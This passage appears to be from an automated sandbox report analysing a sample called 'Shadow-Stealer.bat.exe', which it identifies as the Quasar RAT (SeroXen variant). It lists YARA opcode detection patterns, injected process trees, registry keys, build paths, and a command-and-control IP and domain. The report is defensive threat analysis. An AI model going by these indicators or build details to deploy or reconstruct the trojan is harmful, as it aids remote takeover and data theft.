              • svchost.exe (PID: 980 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dllhost.exe (PID: 3268 cmdline: C:\Windows\System32\dllhost.exe /Processid:{6cf183fd-4345-4e83-86c3-b67edbc5a93f} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
              • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dllhost.exe (PID: 5112 cmdline: C:\Windows\System32\dllhost.exe /Processid:{a65f9779-a778-403b-96e3-bdb0de023251} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • lsass.exe (PID: 652 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • dwm.exe (PID: 996 cmdline: dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
        • dllhost.exe (PID: 4176 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{e8c47de4-1fa8-45ae-ba48-1e652857c9f1} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • dllhost.exe (PID: 5564 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{38d5fde3-99ae-4373-8c2f-8b4f5f08f7f3} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
          • cscript.exe (PID: 6776 cmdline: "cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus MD5: CB601B41D4C8074BE8A84AED564A94DC)
          • WmiPrvSE.exe (PID: 3040 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
        • dllhost.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{25768c7a-7ac5-4718-a464-d7bd931650f7} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • dllhost.exe (PID: 3968 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{b21552e6-10c0-4b77-8348-e34fa993b74e} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
          • yApVCRtJPjQJu.exe (PID: 6932 cmdline: "C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • dllhost.exe (PID: 5132 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{408c66d6-6f69-434f-838a-86e87b4371ae} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • dllhost.exe (PID: 5076 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{205dcea9-d057-463c-a3cf-998f0b1939dc} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      0000000F.00000002.3570248897.000001FACD23D000.00000004.00000800.00020000.00000000.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
      • 0x3a6528:$op1: 04 1E FE 02 04 16 FE 01 60
      • 0x3f6560:$op1: 04 1E FE 02 04 16 FE 01 60
      • 0x3a644c:$op2: 00 17 03 1F 20 17 19 15 28
      • 0x3f6484:$op2: 00 17 03 1F 20 17 19 15 28
      • 0x3a6e92:$op3: 00 04 03 69 91 1B 40
      • 0x3a76bb:$op3: 00 04 03 69 91 1B 40
      • 0x3f6eca:$op3: 00 04 03 69 91 1B 40
      • 0x3f76f3:$op3: 00 04 03 69 91 1B 40
      Process Memory Space: $sxr-powershell.exe PID: 6400JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: $sxr-powershell.exe PID: 6400JoeSecurity_QuasarYara detected Quasar RATJoe Security
          SourceRuleDescriptionAuthorStrings
          15.2.$sxr-powershell.exe.1facccc4e50.31.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            15.2.$sxr-powershell.exe.1facd584ef8.29.unpackQuasar_RAT_1Detects Quasar RATFlorian Roth
            • 0x5c830:$op1: 04 1E FE 02 04 16 FE 01 60
            • 0xac868:$op1: 04 1E FE 02 04 16 FE 01 60
            • 0x5c754:$op2: 00 17 03 1F 20 17 19 15 28
            • 0xac78c:$op2: 00 17 03 1F 20 17 19 15 28
            • 0x5d19a:$op3: 00 04 03 69 91 1B 40
            • 0x5d9c3:$op3: 00 04 03 69 91 1B 40
            • 0xad1d2:$op3: 00 04 03 69 91 1B 40
            • 0xad9fb:$op3: 00 04 03 69 91 1B 40
            15.2.$sxr-powershell.exe.1facd584ef8.29.raw.unpackQuasar_RAT_1Detects Quasar RATFlorian Roth
            • 0x5e630:$op1: 04 1E FE 02 04 16 FE 01 60
            • 0xae668:$op1: 04 1E FE 02 04 16 FE 01 60
            • 0x5e554:$op2: 00 17 03 1F 20 17 19 15 28
            • 0xae58c:$op2: 00 17 03 1F 20 17 19 15 28
            • 0x5ef9a:$op3: 00 04 03 69 91 1B 40
            • 0x5f7c3:$op3: 00 04 03 69 91 1B 40
            • 0xaefd2:$op3: 00 04 03 69 91 1B 40
            • 0xaf7fb:$op3: 00 04 03 69 91 1B 40
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Yara matchFile source: Process Memory Space: $sxr-powershell.exe PID: 6400, type: MEMORYSTR
            Source: eu-central-7075.packetriot.netVirustotal: Detection: 15%Perma Link

            Compliance

            barindex
            Source: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exeUnpacked PE file: 42.2.yApVCRtJPjQJu.exe.2930000.6.unpack
            Source: Binary string: <Module>costura.metadatacostura.sharpdx.direct3d11.pdb.compressedcostura.costura.pdb.compressedcostura.sharpdx.dxgi.pdb.compressedcostura.sharpdx.pdb.compressedcostura.sharpdx.direct3d11.dll.compressedcostura.costura.dll.compressedcostura.sharpdx.dxgi.dll.compressedcostura.gma.system.mousekeyhook.dll.compressedcostura.system.runtime.interopservices.runtimeinformation.dll.compressedcostura.quasar.common.dll.compressedcostura.newtonsoft.json.dll.compressedcostura.bouncycastle.crypto.dll.compressedcostura.ionic.zip.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.de.microsoft.win32.taskscheduler.resources.dll.compressedcostura.pl.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-cn.microsoft.win32.taskscheduler.resources.dll.compressedcostura.fr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.es.microsoft.win32.taskscheduler.resources.dll.compressedcostura.it.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-hant.microsoft.win32.taskscheduler.resources.dll.compressedcostura.ru.microsoft.win32.taskscheduler.resources.dll.compressedcostura.protobuf-net.dll.compressedcostura.sharpdx.dll.compressed4a731784-801d-481b-a36f-654a2936777eQuasar.Client.InstallStager.exeQuasar.Client.UninstallStager.exeQuasar.Client.ResetPatcher.binQuasar.Client.QuasarApplication.resourcesQuasar.Client.Properties.Resources.resourcesILRepack.List source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\C5\Documents\SeroXen Stuff\Quasar-master\Quasar-master-release\bin\Release\net452\REPOS\seroxen rootkit stuff\InstallStager\bin\Release\InstallStager.pdb source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.dxgi.pdb.compressed|||SharpDX.DXGI.pdb|D73E59804E3EE494A4612185771F7F67B2FD64AE|34752 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mshta.pdbGCTL source: $sxr-mshta.exe, 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe, 0000000A.00000000.2355999536.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe.3.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yApVCRtJPjQJu.exe, 0000002A.00000002.3355364200.000000000083E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: costura.costura.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.pdb.compressed|||SharpDX.pdb|1A7C10AA582CCEEBFFD9BC77A11353AAAE6417E9|42824 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: $sxr-cmd.exe, 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe, 0000000D.00000000.2370623512.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe.3.dr
            Source: Binary string: #costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed|||SharpDX.Direct3D11.pdb|A2259A45EA284247B3AA65EC9C1DBEBD47FE208F|78220 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: powershell.pdbUGP source: Shadow-Stealer.bat.exe, 00000003.00000000.2146647550.00007FF6BFFCA000.00000002.00000001.01000000.00000003.sdmp, Shadow-Stealer.bat.exe.0.dr, $sxr-powershell.exe.3.dr
            Source: Binary string: powershell.pdb source: Shadow-Stealer.bat.exe, 00000003.00000000.2146647550.00007FF6BFFCA000.00000002.00000001.01000000.00000003.sdmp, Shadow-Stealer.bat.exe.0.dr, $sxr-powershell.exe.3.dr
            Source: Binary string: costura.sharpdx.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdb source: $sxr-cmd.exe, 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe, 0000000D.00000000.2370623512.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe.3.dr
            Source: Binary string: )costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mshta.pdb source: $sxr-mshta.exe, 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe, 0000000A.00000000.2355999536.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe.3.dr
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
            Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
            Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2DBEDC FindFirstFileExW,10_2_000001ACEA2DBEDC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5BBEDC FindFirstFileExW,13_2_000002155A5BBEDC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,13_2_00007FF7137F823C
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,13_2_00007FF7137F2978
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF713807B4C FindFirstFileW,FindNextFileW,FindClose,13_2_00007FF713807B4C
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,13_2_00007FF7137E35B8
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,13_2_00007FF7137E1560
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC7BEDC FindFirstFileExW,19_2_000001F5FDC7BEDC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165EBEDC FindFirstFileExW,22_2_000002D0165EBEDC
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F151BEDC FindFirstFileExW,24_2_000002D6F151BEDC
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FDBEDC FindFirstFileExW,25_2_0000014E41FDBEDC
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B49BEDC FindFirstFileExW,26_2_000001D15B49BEDC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F9AE0 FindFirstFileExW,28_2_009F9AE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A19AE0 FindFirstFileExW,28_2_00A19AE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B19AE0 FindFirstFileExW,28_2_00B19AE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B39AE0 FindFirstFileExW,28_2_00B39AE0
            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
            Source: Joe Sandbox ViewIP Address: 167.71.56.116 167.71.56.116
            Source: global trafficTCP traffic: 192.168.2.6:49716 -> 167.71.56.116:22112
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486093727.000002D6F0E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: lsass.exe, 00000018.00000000.2485971578.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3366282743.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3364189171.000002D6F0C45000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485797316.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3367690216.000002D6F0E11000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3365446317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486093727.000002D6F0E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485919317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
            Source: lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
            Source: cscript.exe, 0000001C.00000002.3371306184.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001C.00000000.2515366668.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: lsass.exe, 00000018.00000002.3361372135.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3367690216.000002D6F0E11000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3365446317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486093727.000002D6F0E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485626357.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485919317.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: lsass.exe, 00000018.00000000.2485971578.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3366282743.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3364189171.000002D6F0C45000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485797316.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: lsass.exe, 00000018.00000002.3366904685.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2486040854.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: lsass.exe, 00000018.00000002.3362525625.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
